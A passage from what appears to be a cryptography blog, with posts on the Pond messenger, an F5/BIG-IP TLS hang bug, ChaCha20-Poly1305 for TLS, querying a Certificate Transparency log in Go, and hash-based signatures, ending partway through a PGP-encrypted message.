  • No spam: only approved contacts can send you messages. In order for the server to enforce that without revealing the identity of every sender, pairing-based, group signatures are used. (The flip side is that there are no public addresses, so you can't message someone that you don't already know.)
  • Forward security: the exchange of messages drives a Diffie-Hellman ratchet preventing a point-in-time compromise from giving the attacker the ability to decrypt past messages (modulo the week-long retention).
  • Erasure storage: since B-tree filesystems like btrfs and log-structured SSDs mean that one can have very little confidence in being able to securely erase anything, Pond tries to use the TPM NVRAM to securely delete old state. (Note: not implemented for OS X yet.)
  • One-to-one only: No messages to multiple contacts (yet). Haven't implemented it.

The source code is in Go, but there are binaries for several Linux flavors and OS X. (Although it looks terrible on OS X and one user reports that the program can only be closed by killing it from the command line: I've not reproduced that yet.) In addition to the default server, I learned recently that the Wau Holland Foundation also runs a Pond server.

For more details, see the user guide, threat model etc which are linked from the project page.

If you get it running, but don't know anyone else, you can use:

gpg --recv-key C92172384F387DBAED4D420165EB9636F02C5704

to get my public key and email me a shared-secret. (Although I only check that email during the evenings.)

Please update F5/BIG-IP firmware

Update (Dec 7th): an F5 engineer commented on the TLS WG mailing list describing the internals of the hang bug. Based on this, we realised that it would be possible to work around the issue by padding ClientHello messages of a certain size. We now have a design for doing this, it's implemented in Chrome and it appears to be working! So, while you should always keep software up to date, it appears that the Internet can dodge this bug!

If you use F5/BIG-IP devices to terminate SSL connections, please update the firmware on the things! We're trying to run an Internet here and old versions of these devices are a real problem for deploying new TLS features. You need to be running at least version 10.2.4 (as far as I know), but running the latest version is generally good advice.

If you just try to connect to these sites with a recent version of OpenSSL, you should find that the connection hangs - which is terrible. We can detect a server that returns an error, but hanging the connection isn't something we can generally work around.

$ openssl version
OpenSSL 1.0.1e 11 Feb 2013
$ openssl s_client -connect stubhub.com:443
CONNECTED(00000003)
hangs!
$ openssl s_client -connect stubhub.com:443 -tls1
New, TLSv1/SSLv3, Cipher is AES256-SHA
Server public key is 2048 bit
Secure Renegotiation IS NOT supported
Compression: NONE
Expansion: NONE
...

I did have a long list of major sites that were affected by this issue here. I've removed it because some of them had updated and, because of the update at the top, it's no longer a crippling problem.

ChaCha20 and Poly1305 for TLS

Today, TLS connections predominantly use one of two families of cipher suites: RC4 based or AES-CBC based. However, in recent years both of these families of cipher suites have suffered major problems. TLS's CBC construction was the subject of the BEAST attack (fixed with 1/n-1 record splitting or TLS 1.1) and Lucky13 (fixed with complex implementation tricks). RC4 was found to have key-stream biases that cannot effectively be fixed.

Although AES-CBC is currently believed to be secure when correctly implemented, a correct implementation is so complex that there remains strong motivation to replace it.

Clearly we need something better. An obvious alternative is AES-GCM (AES-GCM is AES in counter mode with a polynomial authenticator over GF(2128)), which is already specified for TLS and has some implementations. Support for it is in the latest versions of OpenSSL and it has been the top preference cipher of Google servers for some time now. Chrome support should be coming in Chrome 31, which is expected in November. (Although we're still fighting to get TLS 1.2 support deployed in Chrome 30 due to buggy servers.)

AES-GCM isn't perfect, however. Firstly, implementing AES and GHASH (the authenticator part of GCM) in software in a way which is fast, secure and has good key agility is very difficult. Both primitives are suited to hardware implementations and good software implementations are worthy of conference papers. The fact that a naive implementation (which is also what's recommended in the standard for GHASH!) leaks timing information is a problem.

AES-GCM also isn't very quick on lower-powered devices such as phones, and phones are now a very important class of device. A standard phone (which is always defined by whatever I happen to have in my pocket; a Galaxy Nexus at the moment) can do AES-128-GCM at only 25MB/s and AES-256-GCM at 20MB/s (both measured with an 8KB block size).

Lastly, if we left things as they are, AES-GCM would be the only good cipher suite in TLS. While there are specifications for AES-CCM and for fixing the AES-CBC construction, they are all AES based and, in the past, having some diversity in cipher suites has proven useful. So we would be looking for an alternative even if AES-GCM were perfect.

In light of this, Google servers and Chrome will soon be supporting cipher suites based around ChaCha20 and Poly1305. These are primitives developed by Dan Bernstein and are fast, secure, have high quality, public domain implementations, are naturally constant time and have nearly perfect key agility.

On the same phone as the AES-GCM speeds were measured, the ChaCha20+Poly1305 cipher suite runs at 92MB/s (which should be compared against the AES-256-GCM speed as ChaCha20 is a 256-bit cipher).

In addition to support in Chrome and on Google's servers, myself and my colleague, Elie Bursztein, are working on patches for NSS and OpenSSL to support this cipher suite. (And I should thank Dan Bernstein, Andrew M, Ted Krovetz and Peter Schwabe for their excellent, public domain implementations of these algorithms. Also Ben Laurie and Wan-Teh Chang for code reviews, suggestions etc.)

But while AES-GCM's hardware orientation is troublesome for software implementations, it's obviously good news for hardware implementations and some systems do have hardware AES-GCM support. Most notably, Intel chips have had such support (which they call AES-NI) since Westmere. Where such support exists, it would be a shame not to use it because it's constant time and very fast (see slide 17). So, once ChaCha20+Poly1305 is running, I hope to have clients change their cipher suite preferences depending on the hardware that they're running on, so that, in cases where both client and server support AES-GCM in hardware, it'll be used.

To wrap all this up, we need to solve a long standing, browser TLS problem: in order to deal with buggy HTTPS servers on the Internet (of which there are many, sadly), browsers will retry failed HTTPS connections with lower TLS version numbers in order to try and find a version that doesn't trigger the problem. As a last attempt, they'll try an SSLv3 connection with no extensions.

Several useful features get jettisoned when this occurs but the important one for security, up until now, has been that elliptic curve support is disabled in SSLv3. For servers that support ECDHE but not DHE that means that a network attacker can trigger version downgrades and remove forward security from a connection. Now that AES-GCM and ChaCha20+Poly1305 are important we have to worry about them too as these cipher suites are only defined for TLS 1.2.

Something needs to be done to fix this so, with Chrome 31, Chrome will no longer downgrade to SSLv3 for Google servers. In this experiment, Google servers are being used as an example of non-buggy servers. The experiment hopes to show that networks are sufficiently transparent that they'll let at least TLS 1.0 through. We know from Chrome's statistics that connections to Google servers do end up getting downgraded to SSLv3 sometimes, but all sorts of random network events can trigger a downgrade. The fear is that there's some common network element that blocks TLS connections by deep-packet inspection, which we'll measure by breaking them and seeing how many bug reports we get.

If that works then, in Chrome 32, no fallbacks will be permitted for Google servers at all. This stage of the experiment tests that the network is transparent to TLS 1.2 by, again, breaking anything that isn't and seeing if it causes bug reports.

If both those experiments work then, great! We can define a way for servers to securely indicate that they don't need version fallback. It would be nice to have used the renegotiation extension for this, but I think that there are likely already too many broken servers that support that, so another SCSV is probably needed.

If we get all of the above working then we're not in too bad a state with respect to TLS cipher suites. At least, once most of the world has upgraded in any case.

Playing with the Certificate Transparency pilot log

I've written about Certificate Transparency several times in the past, but now there's actually something to play with! (And, to be clear, this is entirely thanks to several of my colleagues, not me!) So I though it would be neat to step through some simple requests of the pilot log.

I'm going to be using Go for this, because I like it. But it's substantially just JSON and HTTP and one could do it in any language.

In order to query a log you need to know its URL prefix and public key. Here's a structure to represent that.

// Log represents a public log.
type Log struct {
	Root string
	Key *ecdsa.PublicKey
}

For the pilot log, the URL prefix is https://ct.googleapis.com/pilot and here's the public key:

-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEfahLEimAoz2t01p3uMziiLOl/fHT
DM0YDOhBRuiBARsV4UvxG2LdNgoIGLrtCzWE0J5APC2em4JlvR8EEEFMoA==
-----END PUBLIC KEY-----

Since it's a little obscure, here's the code to parse a public key like that. (This code, and much of the code below, is missing error checking because I'm just playing around.)

	block, _ := pem.Decode([]byte(pilotKeyPEM))
	key, _ := x509.ParsePKIXPublicKey(block.Bytes)
	pilotKey = key.(*ecdsa.PublicKey)
	pilotLog = &Log{Root: "https://ct.googleapis.com/pilot", Key: pilotKey}

The log is a tree, so the first thing that we want to do with a log is to get its head. This is detailed in section 4.3 of the RFC: we make an HTTP GET to get-sth and it returns a JSON blob.

Any HTTP client can do that, so give it a go with curl on the command line:

$ curl https://ct.googleapis.com/pilot/ct/v1/get-sth 2>>/dev/null | less

You should get a JSON blob that, with a bit of formatting, looks like this:

{
	"tree_size": 1979426,
	"timestamp": 1368891548960,
	"sha256_root_hash": "8UkrV2kjoLcZ5fP0xxVtpsSsWAnvcV8aPv39vh96J2o=",
	"tree_head_signature": "BAMARjBEAiAc95/ONhz2vQsULrISlLumvpo..."
}
In Go, we'll parse that into a structure like this:

// Head contains a signed tree head.
type Head struct {
	Size uint64 `json:"tree_size"`
	Time time.Time `json:"-"`
	Hash []byte `json:"sha256_root_hash"`
	Signature []byte `json:"tree_head_signature"`
	Timestamp uint64 `json:"timestamp"`
}

And here's some code to make the HTTP request, check the signature and return such a structure:

func (log *Log) GetHead() (*Head, error) {
	// See https://tools.ietf.org/html/rfc6962#section-4.3
	resp, err := http.Get(log.Root + "/ct/v1/get-sth")
	if err != nil {
		return nil, err
	}

	defer resp.Body.Close()
	if resp.StatusCode != 200 {
		return nil, errors.New("ct: error from server")
	}
	if resp.ContentLength == 0 {
		return nil, errors.New("ct: body unexpectedly missing")
	}
	if resp.ContentLength > 1<<16 {
		return nil, errors.New("ct: body too large")
	}
	data, err := ioutil.ReadAll(resp.Body)
	if err != nil {
		return nil, err
	}
	
	head := new(Head)
	if err := json.Unmarshal(data, &head); err != nil {
		return nil, err
	}

	head.Time = time.Unix(int64(head.Timestamp/1000), int64(head.Timestamp%1000))

	// See https://tools.ietf.org/html/rfc5246#section-4.7
	if len(head.Signature) < 4 {
		return nil, errors.New("ct: signature truncated")
	}
	if head.Signature[0] != hashSHA256 {
		return nil, errors.New("ct: unknown hash function")
	}
	if head.Signature[1] != sigECDSA {
		return nil, errors.New("ct: unknown signature algorithm")
	}

	signatureBytes := head.Signature[4:]
	var sig struct {
		R, S *big.Int
	}

	if signatureBytes, err = asn1.Unmarshal(signatureBytes, &sig); err != nil {
		return nil, errors.New("ct: failed to parse signature: " + err.Error())
	}
	if len(signatureBytes) > 0 {
		return nil, errors.New("ct: trailing garbage after signature")
	}
	
	// See https://tools.ietf.org/html/rfc6962#section-3.5
	signed := make([]byte, 2 + 8 + 8 + 32)
	x := signed
	x[0] = logVersion
	x[1] = treeHash
	x = x[2:]
	binary.BigEndian.PutUint64(x, head.Timestamp)
	x = x[8:]
	binary.BigEndian.PutUint64(x, head.Size)
	x = x[8:]
	copy(x, head.Hash)

	h := sha256.New()
	h.Write(signed)
	digest := h.Sum(nil)

	if !ecdsa.Verify(log.Key, digest, sig.R, sig.S) {
		return nil, errors.New("ct: signature verification failed")
	}

	return head, nil
}

If one runs this code against the current pilot, we can get the same information as we got with curl: 1979426 certificates at Sat May 18 11:39:08 EDT 2013, although now the date will be newer and there will be more entries.

As you can see, the log has been seeded with some certificates gathered from a scan of the public Internet. Since this data is probably more recent than the EFF's Observatory data, it might be of interest and anyone can download it using the documented interface. Again, we can try a dummy request in curl:

$ curl 'https://ct.googleapis.com/pilot/ct/v1/get-entries?start=0&end=0' 2>>/dev/null | less

You should see a result that starts with {"entries":[{"leaf_input":"AAAAAAE9p. You can request log entries in batches and even download everything if you wish. My toy code simply writes a single large file containing the certificates, gzipped and concatenated with a length prefix.

My toy code is go gettable from https://github.com/agl/certificatetransparency. In the tools directory is ct-sync, which will incrementally download the pilot log and ct-map, which demonstrates how to look for interesting things by extracting the certificates from a local mirror file. Both will use multiple cores if possible so be sure to set GOMAXPROCS. (This is very helpful when calculating the hash of the tree since the code doesn't do that incrementally.)

The project's official code is at https://code.google.com/p/certificate-transparency/. See the README and the main site.

And since we have the tools to look for interesting things, I spent a couple of minutes doing so:

I wrote a quick script to find ‘TURKTRUST’ certificates - leaf certificates that are CA certificates. The log only contains certificates that are valid by a fairly promiscuous root set in order to prevent spam, so we don't have to worry about self-signed certificates giving us false positives. As ever the Korean Government CA is good to highlight malpractice with 40 certificates that mistakenly have the CA bit set (and are currently valid). This issue was reported by a colleague of mine last year. Thankfully, the issuing certificate has a path length constraint that should prevent this issue from being exploited (as long as your X.509 validation checks these sort of details). The root CA is also only present in the Microsoft root set as far as I know.

A different Korean root CA (KISA) can't encode ASN.1 correctly and is issuing certificates with negative serial numbers because ASN.1 INTEGERs are negative if the most significant bit is one.

Another CA is issuing certificates with 8-byte IP addresses (I've let them know).

The ct-map.go in the repository is setup to find publicly valid certificates with names that end in .corp (which will soon not get an HTTPS indication in Chrome.)

Anyway, at the moment the log is just pre-seeded with some public certificates. The real value of CT comes when we have strong assurances that all valid certificates are in the log. That will take some time, but we're working towards it.

Hash based signatures

It's likely that Kevin Poulsen will still be alive in twenty years time, and that his encrypted message to Edward Snowden will still be saved somewhere. In fact, there are several places where people post RSA-encrypted messages and seem to assume that they're secure. Even assuming that no huge advances in factoring occur (and Joux et al have just killed discrete logs in binary fields, so it's not impossible), large, quantum computers will be able to break them.

It might be the case that building practical, quantum computers doesn't turn out to be possible (D-Wave machines don't count here), but there are people trying hard to do it. From “Deep State” (a rather fragmented book, but interesting in parts):

There is a quantum computing arms race of sorts under way. China, Israel and Russia have advanced quantum computing programs with direct aim of gaining geopolitical advantage, as does DARPA itself.

There are classified and semi-classified DARPA and Army/Air Force/Navy Research Lab programs for the potential use of quantum computers for a select set of defense technologies, including: the ability to design a perfect sensing laser for drones or satellites; the ability to design radar that can defeat counter-stealth techniques; the ability to design coatings for aircraft that truly are stealth, owning to the exploitation of quantum fluid dynamics.

Now, government agencies don't care about Wired, but they do care about those things. So it's a possibility that, in a few decades, an academic lab will be in possession of a large quantum computer and might want to pursue some light-hearted historical investigations. (Just in case, I've included the Wired message and key below in case either is deleted ☺)

Despite a common misunderstanding, quantum computers don't break all public key cryptography, and quantum cryptography isn't the answer. (Unless you have lots of money and a dedicated fiber line, and possibly not even then.) Instead post-quantum cryptography is the answer, and there's even a conference on it.

So, should we be using post-quantum algorithms now? The reason that we don't currently use them is because they generally take one or two orders of magnitude more time, space or both. For high-volume work like TLS, that puts them outside the bounds of practicality. But for an application like PGP, where the volume of messages is very low, why not? Size might be an issue but, if it takes 1 second to process a message vs 10 milliseconds, it doesn't really make a difference. You might as well dial the security up to 11.

There are a couple of things that one needs for a system like PGP: encryption and signatures. One option for building post-quantum, public-key signatures is hash-based signatures. These are actually really old! They were described by Lamport in 1979, only a couple of years after RSA. In fact, as Rompel showed, a secure signature scheme exists if and only if a secure hash-based signature scheme exists. Individual hash functions may be broken, but if hash-based signatures are broken in general then there can be no secure signatures at all!

The most primitive hash-based signature can be used only once, and only to sign a single-bit message: Alice picks two random values, x and y and publishes her public key: H(x) and H(y). In order to sign a message, Alice publishes one of the two, original values depending on the value of the bit.

Clearly this only works for a single bit message. It's also a one-time signature because once one of the original values has been published, it's insecure for the same public key to be used again.

The first extension to this scheme is to run many instances in parallel in order to sign larger messages. Fix the hash function, H, as SHA-256. Now Alice picks 512 random values, x0..255 and y0..255 and publishes the hash of each of them as her public key. Now she can sign an arbitrarily long message, m, by calculating H(m) and then publishing either xi or yi depending on the bits of H(m).

It's still one-time though. As soon as Alice signs a different message with the same public key then, for some values of i, both xi and yi have been published. This lets an attacker forge signatures for messages that Alice hasn't signed.

In order to allow signing multiple messages there's one easy solution: just have multiple one-time signatures! Let's say that we want a thousand. The issue is that the public and private keys of our one-time scheme were 512×32 bytes = 16KB and, if we want a thousand of them, then the public and private keys end up being 16MB, which is quite a lot. We can solve the private key size by generating a stream of values from a cipher with just a 32-byte seed key, but the large public key remains.

The solution to this is to use a Merkle hash tree, introduced (unsurprisingly) by Merkle, in 1979.

The the diagram, above, four leaf hashes are included in the hash tree: A, B, C and D. The hash tree is a binary tree where each non-leaf node contains the hash of its children. If Bob believes that H(H(AB)H(CD)) is Alice's public key, then anyone can convince him that A is part of Alice's public key by giving him A, B and H(CD). Bob calculates H(AB) from A and B, and then H(H(AB)H(CD)) from H(AB) and H(CD). If the values match, and if the hash function isn't broken, then A must be part of Alice's public key.

Now, if A, B, C and D were one-time signature public keys then Alice's public key has been reduced to a single hash. Each signature now needs to include the one-time signature value, the rest of the public key, and also a proof that the public key is in Alice's public key. In more detail, the signature contains either xi or yi depending on the bits of the hash of the message to be signed and also H(xi) or H(yi) for the bits that weren't used. With that information, Bob can reconstruct the one-time signature public key. Then the signature contains the path up the tree - i.e. the values B, and H(CD) in our example, which convince Bob that the one-time signature public key is part of Alice's overall public key.

So now the public and private keys have been reduced to just 32 bytes (at least if you're using a 256-bit hash). We can make the tree arbitrarily large, thus supporting arbitrarily many signatures. The signatures, however, are 16KB plus change, which is pretty chunky. So the next trick will try to address this, and it's thanks to Winternitz.

The Winternitz trick was described in Merkle's original, 1979 work and it involves iterating hashes. We started off by considering the one-time signature of a single bit and solved it by publishing H(x) and H(y) and then revealing one of the preimages. What if we generated a single random value, z, and published H(H(z))? We would reveal H(z) if the bit was one, or z if the bit was zero. But an attacker could take our signature of zero (z) and calculate H(z), thus creating a signature of one.

So we need a checksum to make sure that, for any other message, the hash function needs to be broken. So we would need two of these structures and then we would sign 01 or 10. That way, one of the hash chains needs to be broken in order to calculate the signature of a different message. The second bit is the Winternitz checksum.

As it stands, Winternitz's trick hasn't achieved anything - we're still publishing two hash values and revealing two secrets. But when we start signing larger messages it becomes valuable.

Let's say that the Winternitz hash chains were 16 values long. That means that one of them can cover four bits of the hash that we're signing. If we were signing a 256-bit value, then we only need 64 Winternitz chains and three for the checksum. Also, the Winternitz scheme makes it easy for the verifier to calculate the original public key. The signature size has gone from 16KB to 2,144 bytes. Not bad!

But! There's still a critical flaw in this! Recall that using a one-time signature twice completely breaks the system. Because of that, the signature scheme is “stateful”. This means that, when signing, the signer absolutely must record that a one-time key has been used so that they never use it again. If the private key was copied onto another computer and used there, then the whole system is broken.

That limitation might be ok in some situations, and actually means that one can build forward-secure signature schemes: schemes where signatures prior to a key compromise can still be trusted. Perhaps for a CA where the key is in an HSM that might be useful. However, for most environments it's a huge foot-cannon.

We could pick one-time public keys to use based on the hash of the message, or at random in the hope of never colliding but, in order for such schemes to be safe the tree of one-time public keys needs to be really big. Big as in, more than 2128 entries. If we use the trick of generating the private keys from the output of a cipher then, as soon as we fix the cipher private key, we have determined the whole tree. However, although we can compute any part of it, we can't compute all of it. At least not without an infinite amount of time (or close enough to infinite as makes no difference).

So we have to defer calculating parts of the tree until we actually need them in order to generate a signature. In order to defer bits of the tree, we have to split the tree up into a forest of smaller trees. The top-level tree is calculated as before and the Merkle hash of it is the public key. But rather than sign a message with the one-time leaves of that tree, we sign the root hash of a subtree. Since everything is deterministic, the subtree at any position is always the same so we're always signing the same message - which is safe.

Thus, if we wished to have a conceptual hash tree with 2160 leaves, we could split it up, say, every 16 bits. The tip of the tree would be a hash tree with 216 leaves. Those leaves would sign the root of a hash tree of another 216 leaves and so one. In order to make 2160, we would need 10 layers of such trees.

I can't have an image with all 216 leaves in each tree, so 22 will have to do. When generating the key, only the top (blue) tree needs to be calculated. When generating each signature, all the subtrees down the path to the final one-time key need to be calculated. So the signature consists of a one-time signature, from the 3rd leaf of the blue tree, of the root of the red tree (as well as Merkle path to the blue root), plus a one-time signature, from the 1st leaf of the red tree, of the root of the green tree (as well as a Merkle path to the red root), etc.

Obviously these signatures are going to be rather larger, due to all the intermediate signatures, and will take rather longer to calculate, due to calculating all the subtrees on the fly. Below is a little Haskell program that tries to estimate signature size vs signature time. It may well have some bugs because I haven't actually coded up a working example to ensure that it does actually work.

log2 = logBase 2 :: Double -> Double

-- We assume SHA-256 for the sake of this example.
hashBits = 256
hashBytes = hashBits/8
-- This is the Winternitz parameter.
w = 64
wBits = log2 w
-- These are parameters for the Winternitz signature.
l1 = fromIntegral $ ceiling (hashBits/wBits)
l2 = 1 + (fromIntegral $ floor $ log2(l1*(w-1))/wBits)
-- wWords is the number of hash chains that we'll have.
wWords = l1 + l2

-- An SSE2, SHA-256 implementation can hash at 5 cycles/byte
hashCyclesPerByte = 5
-- We assume that we can generate keystream bytes at 2 cycles/byte.
secretCyclesPerByte = 2

otsSignatureBytes = wWords * hashBytes
-- In order to generate a single OTS public key we need to calculate wWords
-- hash chains to a depth of w hashes.
otsHashOps = wWords * w
otsHashBytes = hashBytes * otsHashOps
otsHashCycles = hashCyclesPerByte * otsHashBytes
-- In order to generate the private key, we need to generate this many bytes of
-- key stream.
otsPrivateBytes = wWords * hashBytes
otsPublicBytes = otsPrivateBytes
otsPrivateCycles = secretCyclesPerByte * otsPrivateBytes

-- This is the height of a tree.
treeHeight = 8
-- To calculate the public keys for a whole tree we have to generate 2^treeHeight public keys.
treePublicKeyGenCycles = (otsPrivateCycles + otsHashCycles) * 2**treeHeight
-- To calculate the hash of the root of the tree, we first need to hash all the
-- public keys.
treePublicKeyHashCycles = otsPublicBytes * hashCyclesPerByte * 2**treeHeight
-- Then we need to hash all the hashes
treeMerkleCycles = 2**(treeHeight-1) * hashBytes * hashCyclesPerByte
treeSignatureCycles = treePublicKeyGenCycles + treePublicKeyHashCycles + treeMerkleCycles
-- As part of the signature we need to publish the OTS signature and a path up
-- the Merkle tree. The signature is the same size as a public key because the
-- Winternitz hash chain are just slightly shorter.
treeSignatureBytes = otsPublicBytes + treeHeight*hashBytes

logKeys = 160
forestHeight = fromIntegral $ ceiling (logKeys/treeHeight)
forestSignatureBytes = forestHeight * treeSignatureBytes
forestSignatureCycles = forestHeight * treeSignatureCycles
forestSignatureTime = forestSignatureCycles / 2.9e9

The Haskell code assumes that one can calculate SHA-256 at 5 cycles/byte, which is possible for concurrent hashing as is needed in this case. There are several parameters that one can play with: the Winternitz value, the size of the trees (which is assumed to be uniform here) and the size of the forest. I've taken the size of the forest to be 2160, although that only allows 216 signatures before the probability of a collision reaches 2-128. However, the overall security of the scheme is somewhat less than 128 bits because there are multiple hashes to attack concurrently.

With the parameters that I picked above, the estimated, lower-bound time for signing is 0.8 seconds (on a 2.9GHz machine) and the signatures are 34KB. The algorithm is embarrassingly parallel, so multi-core machines can cut the signing time down a lot, but the size is more difficult to improve. Changing the parameters to achieve a 20KB signature results in a signing time of nearly 30 seconds! (And it's a lower-bound of the signing time - in the real world there will be additional overhead.)

So, should everyone be using hash-based, PGP signatures now? Well, probably not, at least not for a subkey: PGP clearsigned messages would look silly with 34KB of base64-encoded noise at the bottom. Perhaps for a long-term signing key if you really want. But, over the long-term, it's generally confidentiality (i.e. encryption) that you need to maintain and I haven't talked about post-quantum encryption at all in this post. (Maybe in the future.)

But for problems like software updates, a reasonable case can be made. The size of the signature is generally trivial compared to the size of the message and software really does last for decades now. Hash-based signatures allow you to forget about any cryptographic breakthroughs to the greatest degree possible.

There's lots more to hash-based signatures than I've covered here:

  • GMSS treats the forest construction as an optimisation problem and solves for several cases.
  • W-OTS+ builds on several, previous papers and changes the hash property needed from collision resistance to second preimage resistance, which is huge for classical machines! It means that the size of the hash can be halved. However, quantum computers can do a pre-image in 2n/2 time, the same amount of time that classical computers can do a collision, so it doesn't help you there. (Can quantum computers do a collision in 2n/3 time? djb says don't worry.)
  • If you don't mind keeping state, then XMSS is probably the most recent work exploring that problem that I'm aware of. (Although one might want to combine it with W-OTS+.)
  • Tahoe-LAFS has some notes on hash-based signatures, notably some from Daira Hopwood.

And those messages for anyone in possession of a large, quantum computer:

-----BEGIN PGP MESSAGE-----
Version: GnuPG/MacGPG2 v2.0.19 (Darwin)
Comment: GPGTools - http://gpgtools.org

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
